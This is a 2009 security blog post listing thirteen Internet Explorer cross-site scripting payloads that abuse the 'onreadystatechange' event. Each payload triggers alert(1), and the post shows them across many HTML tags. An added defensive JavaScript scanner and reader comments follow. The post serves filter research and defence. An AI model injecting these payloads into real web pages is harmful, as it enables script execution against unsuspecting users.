onreadystatechange
Wednesday, 8 April 2009
I like this event, it’s pretty cool. The reason it’s interesting from an XSS perspective is that it fires automatically, without any user interaction. That is rare in the XSS playground: usually you have to fall back on the onerror, onload or onfocus events, and those only work in certain circumstances.
I’d better mention that the event is only relevant to Internet Explorer as far as I’m aware. If you know of any other browsers it works in then please leave a comment.
So which tags does it execute in? Well, more than you might first think. At first I could only get it to fire automatically with the iframe, script and style tags. But actually the img, image, input, isindex, iframe, script, style, xml and object tags all execute it without user interaction.
Here is a list of the vectors I found. Notice that the xml tag requires some content in order to execute; this can be accomplished by leaving off the closing tag or by including just some text. The object tag requires the type=image attribute. img, image, isindex and input all require a valid image loaded via the src attribute.
<script onreadystatechange=alert(1)>
<iframe onreadystatechange=alert(1)>
<style onreadystatechange=alert(1)>
<script onreadystatechange=alert(1)></script>
<iframe onreadystatechange=alert(1)></iframe>
<style onreadystatechange=alert(1)></style>
<xml onreadystatechange=alert(1)>
<xml onreadystatechange=alert(1)>test</xml>
<object type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)></object>
<img type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
<image type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
<input type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
<isindex type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
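To show the defensive side of the list above, here is an added example of my own (it is not code from the original post): a small JavaScript attribute scanner that flags any attribute whose name starts with "on" and compares that against a denylist of the three events the post says people usually rely on. The function names (listEventHandlers, tagsWithHandlers, missedByDenylist, stripEventHandlers) and the NAIVE_DENYLIST set are my own assumptions; the VECTORS string is the post's own list, including the image URL it uses.

```javascript
// Added example, not code from the original post. Assumed names:
// listEventHandlers, tagsWithHandlers, missedByDenylist, stripEventHandlers,
// NAIVE_DENYLIST. Shows why filtering a few well-known event names misses the
// onreadystatechange vectors, while a generic "any on* attribute" rule catches them.

// The vectors listed in the post, joined into one document.
const VECTORS = [
  '<script onreadystatechange=alert(1)>',
  '<iframe onreadystatechange=alert(1)>',
  '<style onreadystatechange=alert(1)>',
  '<script onreadystatechange=alert(1)></script>',
  '<iframe onreadystatechange=alert(1)></iframe>',
  '<style onreadystatechange=alert(1)></style>',
  '<xml onreadystatechange=alert(1)>',
  '<xml onreadystatechange=alert(1)>test</xml>',
  '<object type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)></object>',
  '<img type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>',
  '<image type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>',
  '<input type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>',
  '<isindex type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>',
].join('\n');

// One start tag: tag name, then attributes whose optional values may be
// double-quoted, single-quoted or unquoted (the post's vectors are unquoted).
const TAG_RE = /<([a-zA-Z][a-zA-Z0-9]*)((?:\s+[^\s"'>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/g;
// Splits the attribute string captured by TAG_RE into single attributes.
const ATTR_RE = /([^\s"'>\/=]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;

// Every attribute whose name starts with "on", case-insensitively, with its tag.
function listEventHandlers(html) {
  const found = [];
  for (const tagMatch of html.matchAll(TAG_RE)) {
    const tag = tagMatch[1].toLowerCase();
    for (const attr of tagMatch[2].matchAll(ATTR_RE)) {
      const name = attr[1].toLowerCase();
      if (name.startsWith('on')) found.push({ tag, attr: name });
    }
  }
  return found;
}

// Sorted, de-duplicated tag names that carry an event handler attribute.
function tagsWithHandlers(html) {
  return [...new Set(listEventHandlers(html).map((h) => h.tag))].sort();
}

// The three events the post says people usually reach for; a denylist built
// from them is the weak setting this example argues against.
const NAIVE_DENYLIST = new Set(['onerror', 'onload', 'onfocus']);

// Handlers that would slip past a name-based denylist.
function missedByDenylist(html, denylist = NAIVE_DENYLIST) {
  return listEventHandlers(html).filter((h) => !denylist.has(h.attr));
}

// The corrected rule: drop every on* attribute, whatever its name,
// and rebuild the start tag from the attributes that remain.
function stripEventHandlers(html) {
  return html.replace(TAG_RE, (whole, tag, attrs) => {
    const kept = [];
    for (const attr of attrs.matchAll(ATTR_RE)) {
      if (!attr[1].toLowerCase().startsWith('on')) kept.push(attr[0]);
    }
    const selfClosing = whole.endsWith('/>') ? ' /' : '';
    return '<' + tag + (kept.length ? ' ' + kept.join(' ') : '') + selfClosing + '>';
  });
}

// Stand-alone demonstration when run directly with node.
console.log('handlers found:', listEventHandlers(VECTORS).length);
console.log('tags carrying a handler:', tagsWithHandlers(VECTORS).join(', '));
console.log('missed by naive denylist:', missedByDenylist(VECTORS).length);
console.log('handlers left after stripping:', listEventHandlers(stripEventHandlers(VECTORS)).length);
```

Run it with node and the naive denylist misses all thirteen vectors, while the generic rule strips every one. The regexes are there to make the point readable, not to be a sanitizer: a production filter should parse the HTML with a real parser and apply an attribute allowlist, precisely because unclosed tags like the bare xml and script vectors in the list are the kind of input that pattern-based filters mishandle.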
No. 1 — April 8th, 2009 at 1:44 pm
Hey,
I’ve tried this in IE6 and IE8 but cannot reproduce it. Even the <script onreadystate=alert(1)> didn’t work for me.
Can you explain a bit more how you achieved it? Otherwise I would say IE is not vulnerable…
No. 2 — April 8th, 2009 at 1:48 pm
It should be onreadystatechange, sorry, I must have been tired.
No. 3 — April 9th, 2009 at 5:20 pm
I just wrote a big reply, but it appeared to be spam…
Great.
You should fix your site.